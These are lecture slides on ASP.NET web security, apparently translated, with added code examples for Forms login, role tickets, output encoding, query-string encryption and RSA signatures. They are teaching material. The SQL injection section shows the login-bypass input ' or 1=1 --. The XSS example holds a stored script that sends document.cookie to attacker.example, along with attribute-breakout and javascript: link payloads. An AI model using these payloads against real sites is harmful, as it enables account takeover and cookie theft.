8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
Security in ASP.NET
23 January 2003
Lng V Minh
Source: ASP.NET: .NET Security Guidance Architecture Guide
Contents
Security issues in web applications; Web.config
Authentication (verifying who the caller is)
Authorization (verifying what the caller may use)
Steps to implement security checks
Some attack types
The .NET security library
SECURITY ISSUES IN WEB APPLICATIONS
Security-related issues for web applications
Hardware-based security
Access-point security (firewall, DoS protection)
Secure transport protocols (SSL, TLS, HTTPS)
Security of the IIS web server
Security in the ASP.NET application layer
SQL database security
Operating-system-level security
The Web.config configuration file
Part of the security configuration:
AUTHENTICATION
The Web.config configuration file
Part of the security configuration (authentication section):
The Web.config configuration file
Controls all security settings of the website
Each website has exactly one Web.config in its root folder
Additional Web.config files may exist in subfolders; each one refines the settings for that folder and everything below it
User authentication (Authentication)
Answers the question: who are you?
Authentication mechanisms in ASP.NET:
Windows-based
Forms-based
Passport
None
Windows-based authentication
Suited to internal (intranet) web systems
No login page: the browser negotiates credentials with the server
Requires Windows domain accounts
Browser cookies must be enabled
Includes these mechanisms:
Basic authentication (password sent Base64-encoded, i.e. effectively in clear; acceptable only over SSL)
Digest authentication (hashed challenge-response, the password itself is never sent; IE)
Integrated authentication (NTLM/Kerberos)
Forms-based authentication
Commonly used for commercial (e-commerce) websites
Has its own login page; suits sites with several permission levels
Can work without cookies (cookieless mode)
Issues with cookieless mode
The SessionID is carried in the query string, so it appears in browser history, Referer headers, proxy and server logs
Configured in Web.config
A session lasts 20 minutes (default) from the user's last request
Session-based attacks:
Public terminal (the next user of a shared machine reuses the URL, and with it the session)
Sniffer (over plain HTTP the ID travels in clear and can be captured and replayed)
Authentication: None
Uses anonymous access to the web server
Security is handled in IIS (ISAPI)
Requests run under the Windows IUSR_machinename account
AUTHORIZATION
The Web.config configuration file
Part of the security configuration (authorization section):
Authorization
Answers the question: what can they see and do?
Checks the user's access rights to folders and files
Mechanisms supported by ASP.NET:
Membership
Role-based security
Verb-based: GET, POST, HEAD (based on the HTTP method)
Anonymous users (?)
All users (*); "authenticated users only" is expressed as deny users="?" followed by allow users="*"
Authorization
? = anonymous users
* = everyone (all users, authenticated or not)
Securing a web page
Add the following element to Web.config:
Securing a web folder
Create a new Web.config in the folder to be protected
It only needs to contain the following:
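The configuration listings on the slides above were images and did not survive extraction. The following root Web.config is an added example, not the deck's own listing: it wires Forms authentication, keeps the session ID out of the query string (the cookieless problems above), restricts one page to authenticated users and specific HTTP verbs, and locks a folder to a role. The file names Login.aspx, Account.aspx, Error.aspx, the folder Admin and the role name Administrators are assumptions for the example.

```xml
<?xml version="1.0"?>
<!-- Root Web.config (example). Forms authentication plus page- and folder-level authorization. -->
<configuration>
  <system.web>
    <!-- Unauthenticated requests to protected resources are redirected to loginUrl. -->
    <authentication mode="Forms">
      <!-- protection="All": the ticket is encrypted and signed, so it cannot be read or tampered with.
           requireSSL="true": the ticket cookie is only sent over HTTPS (defeats the sniffer case).
           timeout: idle minutes before the ticket expires; slidingExpiration renews it on activity.
           cookieless="UseCookies": never fall back to putting the ticket in the URL. -->
      <forms name=".ASPXAUTH"
             loginUrl="Login.aspx"
             protection="All"
             requireSSL="true"
             timeout="20"
             slidingExpiration="true"
             cookieless="UseCookies" />
    </authentication>

    <!-- Site-wide default: anyone may browse. Rules are evaluated top-down, first match wins. -->
    <authorization>
      <allow users="*" />
    </authorization>

    <!-- Session ID in a cookie, not the query string; 20-minute idle timeout as on slide 13. -->
    <sessionState mode="InProc" cookieless="false" timeout="20" />

    <!-- No stack traces or SQL errors to remote clients. -->
    <customErrors mode="RemoteOnly" defaultRedirect="Error.aspx" />
  </system.web>

  <!-- Securing a single page: deny anonymous (?), allow GET/POST for everyone else, deny other verbs. -->
  <location path="Account.aspx">
    <system.web>
      <authorization>
        <deny users="?" />
        <allow verbs="GET,POST" users="*" />
        <deny users="*" />
      </authorization>
    </system.web>
  </location>

  <!-- Securing a folder from the root file. Equivalent to dropping an Admin/Web.config containing only
       <configuration><system.web><authorization> ... the two rules below ... </authorization></system.web></configuration> -->
  <location path="Admin">
    <system.web>
      <authorization>
        <allow roles="Administrators" />
        <deny users="*" />
      </authorization>
    </system.web>
  </location>
</configuration>
```

The order inside each authorization block matters: ASP.NET stops at the first matching rule, so a trailing deny users="*" is what actually closes the folder; without it the inherited allow users="*" from the root file applies.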
IMPLEMENTATION STEPS
Step 1 - Authentication = Windows
Create and update Web.config
Create the accounts and groups in the Windows operating system
Start using it
Step 1 - Authentication = Forms
Create and update Web.config
Create a login page
Choose where user accounts are stored:
Web.config
XML file, text file, database
Web service
Step 1 - Authentication = Forms
A login form consists of:
Textbox: username
Textbox: password
Checkbox: Remember me (optional)
Button: Login
Password issues:
Minimum length, upper/lower case, special characters
Dictionary attacks
Store passwords hashed (hash function with a per-user salt), never in clear
Step 1 - Authentication = Forms
Some related methods:
FormsAuthentication.Authenticate(string name, string password);   // checks against the <credentials> section in Web.config
FormsAuthentication.RedirectFromLoginPage(string userName, bool createPersistentCookie);
Response.Redirect(string url);
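The three slides above are one procedure: a login form, a password policy with hashed storage, and the FormsAuthentication calls. The following login code-behind is an added example (not from the deck) that puts them together with a database store: passwords are stored as salted PBKDF2 hashes, the lookup is parameterised, unknown user and wrong password produce the same response, and RedirectFromLoginPage issues the ticket. Control names (txtUser, txtPassword, chkRemember, lblError), the Users table columns (UserName, PasswordHash, Salt, Iterations) and the connection string name Main are assumptions.

```csharp
// Login.aspx.cs (added example). Assumed: Users(UserName nvarchar, PasswordHash varbinary,
// Salt varbinary, Iterations int) and a connection string named "Main" in Web.config.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Security.Cryptography;
using System.Web.Security;
using System.Web.UI;

public partial class Login : Page
{
    const int SaltBytes = 16;
    const int HashBytes = 32;

    // Account creation: random salt, iterated hash (PBKDF2 via Rfc2898DeriveBytes). Only salt+hash are stored.
    public static void HashNewPassword(string password, int iterations, out byte[] salt, out byte[] hash)
    {
        salt = new byte[SaltBytes];
        using (var rng = new RNGCryptoServiceProvider()) rng.GetBytes(salt);
        using (var kdf = new Rfc2898DeriveBytes(password, salt, iterations)) hash = kdf.GetBytes(HashBytes);
    }

    // Verification: recompute with the stored salt and iteration count, compare without early exit.
    public static bool VerifyPassword(string password, byte[] salt, int iterations, byte[] expected)
    {
        byte[] actual;
        using (var kdf = new Rfc2898DeriveBytes(password, salt, iterations)) actual = kdf.GetBytes(expected.Length);
        int diff = 0;
        for (int i = 0; i < actual.Length; i++) diff |= actual[i] ^ expected[i];
        return diff == 0;
    }

    protected void btnLogin_Click(object sender, EventArgs e)
    {
        string user = txtUser.Text.Trim();
        string pass = txtPassword.Text;
        // Policy from slide 26: minimum length; a bounded user name keeps the query cheap.
        if (user.Length == 0 || user.Length > 64 || pass.Length < 8)
        {
            lblError.Text = "Invalid credentials.";
            return;
        }

        byte[] salt = null, hash = null;
        int iterations = 0;
        string cs = ConfigurationManager.ConnectionStrings["Main"].ConnectionString;
        using (var con = new SqlConnection(cs))
        using (var cmd = new SqlCommand("select Salt, PasswordHash, Iterations from Users where UserName = @user", con))
        {
            // The user name is data, never part of the SQL text (see the SQL injection slides).
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, 64).Value = user;
            con.Open();
            using (SqlDataReader rdr = cmd.ExecuteReader())
            {
                if (rdr.Read())
                {
                    salt = (byte[])rdr["Salt"];
                    hash = (byte[])rdr["PasswordHash"];
                    iterations = (int)rdr["Iterations"];
                }
            }
        }

        // One generic message for "no such user" and "wrong password": no user enumeration.
        if (salt == null || !VerifyPassword(pass, salt, iterations, hash))
        {
            lblError.Text = "Invalid credentials.";
            return;
        }

        // Issues the forms ticket (persistent if "Remember me") and redirects to ReturnUrl or the default page.
        FormsAuthentication.RedirectFromLoginPage(user, chkRemember.Checked);
    }
}
```

FormsAuthentication.Authenticate from the slide is only useful when the accounts live in the <credentials> section of Web.config; with a database store the check is the VerifyPassword call above. The iteration count is stored per user so it can be raised for new accounts without invalidating old hashes.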
Step 2
Get the user's identity information
User.Identity
Get authorization information
IsInRole (works out of the box in Windows mode only; under Forms the application must attach the roles itself)
Personalization
Store the needed information in Session
Namespace: System.Web.Security
Step 2
After successful authentication, the user's identity is one of the following types:
GenericIdentity
AuthenticationType, Name, IsAuthenticated
FormsIdentity
AuthenticationType, Name, IsAuthenticated
Ticket
PassportIdentity
AuthenticationType, Name, IsAuthenticated
HasTicket, TicketAge, Item, TimeSinceSignIn
WindowsIdentity
AuthenticationType, Name, IsAuthenticated
IsAnonymous, IsGuest, IsSystem, Token, Impersonate
Some related members
using System.Web.Security;
string name = User.Identity.Name;
bool authenticated = User.Identity.IsAuthenticated;
bool inRole = User.IsInRole(string role);
FormsAuthentication.SignOut();
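Step 2 notes that IsInRole is only automatic in Windows mode. The following Global.asax code is an added example (not from the deck) of how a Forms-authenticated application supplies roles itself: the roles are placed in the UserData field of the encrypted and signed forms ticket at login, and on every request the FormsIdentity the module created is wrapped in a GenericPrincipal carrying those roles, so User.IsInRole and <allow roles="..."> both work. The role lookup at login (the roles array passed in) and the Logout page are assumptions.

```csharp
// Global.asax.cs and Logout.aspx.cs (added example).
using System;
using System.Security.Principal;
using System.Web;
using System.Web.Security;

public class Global : HttpApplication
{
    // Called from the login page instead of RedirectFromLoginPage once the password check passed.
    // "roles" is the application's own lookup result (e.g. from a Roles table); stored comma-separated in UserData.
    public static void IssueTicketWithRoles(HttpResponse response, string user, string[] roles, bool persistent)
    {
        var ticket = new FormsAuthenticationTicket(
            1, user, DateTime.Now, DateTime.Now.AddMinutes(20), persistent,
            string.Join(",", roles), FormsAuthentication.FormsCookiePath);

        // Encrypt() applies the <forms protection="All"> setting: encrypted and signed, so a client cannot
        // add "Administrators" to its own ticket.
        var cookie = new HttpCookie(FormsAuthentication.FormsCookieName, FormsAuthentication.Encrypt(ticket));
        cookie.HttpOnly = true;                         // not readable from script (limits what XSS can steal)
        cookie.Secure = FormsAuthentication.RequireSSL; // mirrors requireSSL in Web.config
        if (persistent) cookie.Expires = ticket.Expiration;
        response.Cookies.Add(cookie);

        response.Redirect(FormsAuthentication.GetRedirectUrl(user, persistent), true);
    }

    // Runs after FormsAuthenticationModule has decrypted and validated the ticket and set Context.User.
    protected void Application_AuthenticateRequest(object sender, EventArgs e)
    {
        if (Context.User == null) return;                                  // anonymous request
        FormsIdentity identity = Context.User.Identity as FormsIdentity;
        if (identity == null || !identity.IsAuthenticated) return;         // not Forms-authenticated

        FormsAuthenticationTicket ticket = identity.Ticket;                // slide 30: FormsIdentity.Ticket
        string[] roles = ticket.UserData.Length == 0 ? new string[0] : ticket.UserData.Split(',');

        // Same identity, now with roles: User.IsInRole("Administrators") and <allow roles=...> work under Forms.
        Context.User = new GenericPrincipal(identity, roles);
    }
}

public partial class Logout : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        FormsAuthentication.SignOut();   // removes the ticket cookie
        Session.Abandon();               // also drop the server-side state slide 29 keeps in Session
        FormsAuthentication.RedirectToLoginPage();
    }
}
```

Roles embedded in the ticket are cheap (no database round trip per request) but stay valid until the ticket expires; if a role must be revoked immediately, look the roles up per request instead of reading UserData.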
SOME ATTACK TYPES
SQL injection attacks
Exploit the way the web page builds its queries
Use input coming from:
Textbox
QueryString
Technique: inject malicious SQL fragments into the application's SQL statement
Typical targets:
Search feature
Paging feature
User authentication
SQL injection attacks
string sql = "select * from KB where content like '" + search.Text + "'";
With search.Text = % the statement becomes:
select * from KB where content like '%'
which matches every row of the table.
SQL injection attacks
string sql = "select * from Users where user = '" + User.Text + "' and pwd = '" + Password.Text + "'";
With User.Text = ' or 1=1 -- and an empty password the statement becomes:
select * from Users where user = '' or 1=1 --' and pwd = ''
The -- comments out the password check and 1=1 is always true, so rows are returned and the login succeeds without a password.
SQL injection attacks
Solutions:
Do not connect as sa (or any sysadmin account); give the application login only the rights it needs
Connection string: store it encrypted
Use stored procedures to run data queries
Use parameters (Parameter objects) in SQL statements
sql = "select * from Users where user = @user and pwd = @pwd";
SqlCommand cmd = new SqlCommand(sql, con);
cmd.Parameters.Add("@user", SqlDbType.NVarChar, 64).Value = User.Text;
cmd.Parameters.Add("@pwd", SqlDbType.NVarChar, 128).Value = Password.Text;
(With hashed passwords, as slide 26 requires, fetch the stored hash by user name and compare it in code instead of comparing pwd in the query.)
Cross-site scripting (XSS) attacks
Exploit the display of data read back from the database (data originally entered by users): malicious HTML/JavaScript is injected into the data content and runs in every visitor's browser
Solutions:
Use validation controls
Use regular expressions
Check the length of input data
Use Server.HtmlEncode on every value written into the page (HtmlDecode reverses the encoding and is not a defence)
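The following page code-behind is an added example (not from the deck) of the XSS case above: one stored comment rendered two ways, the concatenation the slide warns about beside a version that encodes each value for the context it lands in (element content, quoted attribute, href), plus the whitelist validation and length check the slide recommends. The stored comment is constructed for the example; the control name litComments and the field names Author, Body, Website are assumptions.

```csharp
// CommentView.aspx.cs (added example).
using System;
using System.Text;
using System.Text.RegularExpressions;
using System.Web;
using System.Web.UI;

public partial class CommentView : Page
{
    // Constructed record, as an attacker would have submitted it through the comment form.
    const string StoredAuthor  = "bob\" onmouseover=\"alert(1)";
    const string StoredBody    = "nice post<script>new Image().src='http://attacker.example/?c='+document.cookie</script>";
    const string StoredWebsite = "javascript:alert(document.cookie)";

    // VULNERABLE (what the slide describes): database values go straight into the markup.
    // The <script> runs for every reader; the href runs JavaScript on click; the author breaks out of the tag.
    public static string RenderUnsafe(string author, string body, string website)
    {
        return "<p><a href=\"" + website + "\"><b>" + author + "</b></a>: " + body + "</p>";
    }

    // HARDENED: encode per context. HtmlEncode for element content, HtmlAttributeEncode inside a quoted
    // attribute, and the href is only emitted if it is an absolute http(s) URL (encoding alone does not
    // stop a javascript: URL, so the scheme is checked explicitly).
    public static string RenderSafe(string author, string body, string website)
    {
        StringBuilder sb = new StringBuilder("<p>");
        bool link = IsHttpUrl(website);
        if (link) sb.Append("<a href=\"").Append(HttpUtility.HtmlAttributeEncode(website)).Append("\">");
        sb.Append("<b>").Append(HttpUtility.HtmlEncode(author)).Append("</b>");
        if (link) sb.Append("</a>");
        sb.Append(": ").Append(HttpUtility.HtmlEncode(body)).Append("</p>");
        return sb.ToString();
    }

    // Input validation at submit time (slide: regular expression plus length). A whitelist of letters, digits,
    // space and . _ - with a 40-character cap. This complements output encoding; it does not replace it,
    // because stored data can arrive through other paths (imports, other applications, older code).
    static readonly Regex AuthorPattern = new Regex(@"^[\p{L}\p{N} ._-]{1,40}$", RegexOptions.Compiled);
    public static bool IsValidAuthor(string s) { return s != null && AuthorPattern.IsMatch(s); }

    public static bool IsHttpUrl(string s)
    {
        Uri uri;
        return !string.IsNullOrEmpty(s) && s.Length <= 200
            && Uri.TryCreate(s, UriKind.Absolute, out uri)
            && (uri.Scheme == Uri.UriSchemeHttp || uri.Scheme == Uri.UriSchemeHttps);
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        // The same record rendered safely: the script shows up as text, the javascript: link is dropped,
        // and the quote in the author name stays inside the <b> element.
        litComments.Text = RenderSafe(StoredAuthor, StoredBody, StoredWebsite);
    }
}
```

Note that a Label control does not encode its Text either, so the encoding has to happen in code (or a Literal with Mode="Encode" can be used); ASP.NET's request validation blocks some obviously dangerous input but is not a substitute for encoding on output.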
HTTP harvesting attacks
Extracting the data stored in the database by way of:
Textbox, QueryString, Cookie
SQL commands
Paging parameters, e.g. Detail.aspx?id=1, then id=2, id=3, ... until the whole table has been pulled
Solutions:
Encrypt the query string
Use System.Drawing (render the data, or a challenge, as an image rather than as text)
Monitor users' browsing behaviour (rate and volume of detail requests)
Charge partners for data access
THE .NET SECURITY LIBRARY
System.Security.Cryptography
The security library in .NET
Encryption
The SSL (Secure Sockets Layer) protocol
Digital signatures
Encryption
Encryption: transforming data into a different representation
Algorithm
Key
Three techniques:
Hash
Asymmetric encryption (public key)
Symmetric encryption (secret key)
Hash
A hash algorithm produces a fixed-size digest from a message of any length
Collisions are very rare for a sound algorithm (practical collisions exist for MD5 and SHA-1, so neither should be used in new designs)
No key is used
The digest cannot be reversed into the original message
Algorithms: MD5, SHA-1, SHA-256, SHA-512, ...
Hash classes
MD5CryptoServiceProvider
SHA1CryptoServiceProvider, SHA1Managed
SHA256CryptoServiceProvider, SHA256Managed
SHA512CryptoServiceProvider, SHA512Managed
Symmetric encryption
Uses a single key
The secret key both encrypts and decrypts the message
Algorithms: 3DES, Rijndael (AES), Blowfish, IDEA, ...
Symmetric encryption classes
AesCryptoServiceProvider
AesManaged
DESCryptoServiceProvider (56-bit key, obsolete)
RC2CryptoServiceProvider
RijndaelManaged
TripleDESCryptoServiceProvider
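The HTTP harvesting slide suggests encrypting the query string so Detail.aspx?id=1, 2, 3 cannot be enumerated, and the symmetric section lists AesManaged. The following class is an added example (not from the deck) that ties the two together: the record id is AES-CBC encrypted under a fresh random IV and the result is authenticated with HMAC-SHA256, because encryption alone does not stop a client from submitting a modified ciphertext. Key handling is an assumption: the keys are generated in Demo() for illustration and would normally be loaded from a protected configuration section.

```csharp
// QueryStringProtector.cs (added example).
using System;
using System.Security.Cryptography;

public static class QueryStringProtector
{
    const int IvLen = 16, TagLen = 32;

    // token = urlsafe_base64( IV || AES-CBC(id) || HMAC-SHA256(IV || ciphertext) )   (encrypt-then-MAC)
    public static string Protect(int id, byte[] encKey, byte[] macKey)
    {
        byte[] plain = BitConverter.GetBytes(id);
        byte[] iv, cipher;
        using (var aes = new AesManaged { Key = encKey, Mode = CipherMode.CBC, Padding = PaddingMode.PKCS7 })
        {
            aes.GenerateIV();                                   // new IV per token: equal ids give different tokens
            iv = aes.IV;
            using (ICryptoTransform enc = aes.CreateEncryptor()) cipher = enc.TransformFinalBlock(plain, 0, plain.Length);
        }
        byte[] body = Concat(iv, cipher);
        byte[] tag;
        using (var hmac = new HMACSHA256(macKey)) tag = hmac.ComputeHash(body);
        return ToUrlSafeBase64(Concat(body, tag));
    }

    // False for anything not produced by Protect under these keys; the caller gets no detail about why.
    public static bool TryUnprotect(string token, byte[] encKey, byte[] macKey, out int id)
    {
        id = 0;
        byte[] blob;
        try { blob = FromUrlSafeBase64(token); } catch (FormatException) { return false; }
        if (blob.Length < IvLen + 16 + TagLen) return false;

        byte[] body = new byte[blob.Length - TagLen], tag = new byte[TagLen];
        Buffer.BlockCopy(blob, 0, body, 0, body.Length);
        Buffer.BlockCopy(blob, body.Length, tag, 0, TagLen);

        byte[] expected;
        using (var hmac = new HMACSHA256(macKey)) expected = hmac.ComputeHash(body);
        if (!FixedTimeEquals(tag, expected)) return false;     // MAC first: tampered input never reaches the cipher

        byte[] iv = new byte[IvLen], cipher = new byte[body.Length - IvLen];
        Buffer.BlockCopy(body, 0, iv, 0, IvLen);
        Buffer.BlockCopy(body, IvLen, cipher, 0, cipher.Length);
        try
        {
            using (var aes = new AesManaged { Key = encKey, IV = iv, Mode = CipherMode.CBC, Padding = PaddingMode.PKCS7 })
            using (ICryptoTransform dec = aes.CreateDecryptor())
            {
                byte[] plain = dec.TransformFinalBlock(cipher, 0, cipher.Length);
                if (plain.Length != 4) return false;
                id = BitConverter.ToInt32(plain, 0);
                return true;
            }
        }
        catch (CryptographicException) { return false; }
    }

    // Round trip, then a one-character change to the token, which the MAC check rejects.
    public static bool Demo()
    {
        byte[] encKey = new byte[32], macKey = new byte[32];   // demo keys; real keys come from protected config
        using (var rng = new RNGCryptoServiceProvider()) { rng.GetBytes(encKey); rng.GetBytes(macKey); }
        string token = Protect(42, encKey, macKey);            // use as Detail.aspx?id=<token>
        int id;
        bool ok = TryUnprotect(token, encKey, macKey, out id) && id == 42;
        char[] c = token.ToCharArray(); c[5] = c[5] == 'A' ? 'B' : 'A';
        bool rejected = !TryUnprotect(new string(c), encKey, macKey, out id);
        return ok && rejected;
    }

    static bool FixedTimeEquals(byte[] a, byte[] b)
    {
        if (a.Length != b.Length) return false;
        int diff = 0;
        for (int i = 0; i < a.Length; i++) diff |= a[i] ^ b[i];
        return diff == 0;
    }
    static byte[] Concat(byte[] a, byte[] b)
    {
        byte[] r = new byte[a.Length + b.Length];
        Buffer.BlockCopy(a, 0, r, 0, a.Length); Buffer.BlockCopy(b, 0, r, a.Length, b.Length);
        return r;
    }
    static string ToUrlSafeBase64(byte[] b) { return Convert.ToBase64String(b).TrimEnd('=').Replace('+', '-').Replace('/', '_'); }
    static byte[] FromUrlSafeBase64(string s)
    {
        string t = s.Replace('-', '+').Replace('_', '/');
        switch (t.Length % 4) { case 2: t += "=="; break; case 3: t += "="; break; case 1: throw new FormatException(); }
        return Convert.FromBase64String(t);
    }
}
```

Opaque ids stop the id=1,2,3 enumeration, but they do not decide whether the current user is allowed to see record 42: Detail.aspx still has to check ownership or role after TryUnprotect succeeds. The same construction also protects the SessionID-in-URL case from the cookieless slide only in the sense of making it unguessable; it is still replayable by whoever sees the URL.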
Asymmetric encryption
Uses two keys
Public key: encrypts the message; private key: decrypts it (for signatures the roles swap: the private key signs, the public key verifies)
Algorithms: RSA, DSA, ...
Asymmetric encryption classes
DSACryptoServiceProvider
RSACryptoServiceProvider
ECDiffieHellmanCng
ECDsaCng
The SSL protocol
SSL: Secure Sockets Layer
A protocol that secures the connection between client and server: the server is authenticated by its certificate and the traffic is encrypted and integrity-protected
Digital signatures
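The digital signature slides were images and did not survive extraction. The following is an added example (not from the deck) using RSACryptoServiceProvider from the asymmetric class list: the private key signs a SHA-256 digest of the message, anyone holding only the public key verifies it, and a single flipped bit in the message makes verification fail. The message text and the 2048-bit key size are choices made for the example; CSP provider type 24 (PROV_RSA_AES) is used because the default provider cannot sign with SHA-256.

```csharp
// Signer.cs (added example).
using System;
using System.Security.Cryptography;
using System.Text;

public static class Signer
{
    // Provider type 24 = PROV_RSA_AES, the CSP that supports SHA-2 digests. PersistKeyInCsp=false keeps the
    // demo key out of the machine key store; a real signing key would live in a named, access-controlled container.
    public static RSACryptoServiceProvider NewKeyPair()
    {
        var rsa = new RSACryptoServiceProvider(2048, new CspParameters(24));
        rsa.PersistKeyInCsp = false;
        return rsa;
    }

    // Signing: private key, SHA-256 digest of the message, PKCS#1 v1.5 signature.
    public static byte[] Sign(RSACryptoServiceProvider privateKey, byte[] message)
    {
        return privateKey.SignData(message, "SHA256");
    }

    // Verification needs only the public parameters (ToXmlString(false) exported them).
    public static bool Verify(string publicKeyXml, byte[] message, byte[] signature)
    {
        using (var rsa = new RSACryptoServiceProvider(new CspParameters(24)))
        {
            rsa.PersistKeyInCsp = false;
            rsa.FromXmlString(publicKeyXml);
            return rsa.VerifyData(message, "SHA256", signature);
        }
    }

    // Sign, verify, tamper, verify again.
    public static bool Demo()
    {
        byte[] msg = Encoding.UTF8.GetBytes("transfer 100 to account 42");   // constructed sample message
        using (RSACryptoServiceProvider key = NewKeyPair())
        {
            string publicKeyXml = key.ToXmlString(false);   // safe to publish; false = exclude private parameters
            byte[] sig = Sign(key, msg);

            bool valid = Verify(publicKeyXml, msg, sig);
            msg[msg.Length - 1] ^= 0x01;                     // flip one bit: "42" becomes "43"
            bool tamperedAccepted = Verify(publicKeyXml, msg, sig);

            Console.WriteLine("valid={0} tamperedAccepted={1}", valid, tamperedAccepted);
            return valid && !tamperedAccepted;
        }
    }
}
```

This is the inverse of the encryption direction on the previous slide: encryption uses the recipient's public key so only the private key can read, while a signature uses the signer's private key so anyone with the public key can check origin and integrity. Signing the digest rather than the message is what lets RSA handle input of any length.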
Security tips
Trust nothing 100%
Estimate the risk:
Likelihood of attack
Consequences
Train staff:
Architects, developers, users, administrators
Review:
Source code, GUI
Microsoft Baseline Security Analyzer 1.2:
Scan the network or the local machine
Scan installed updates
Scan for well-known issues
http://www.securitystats.com/tools/password.php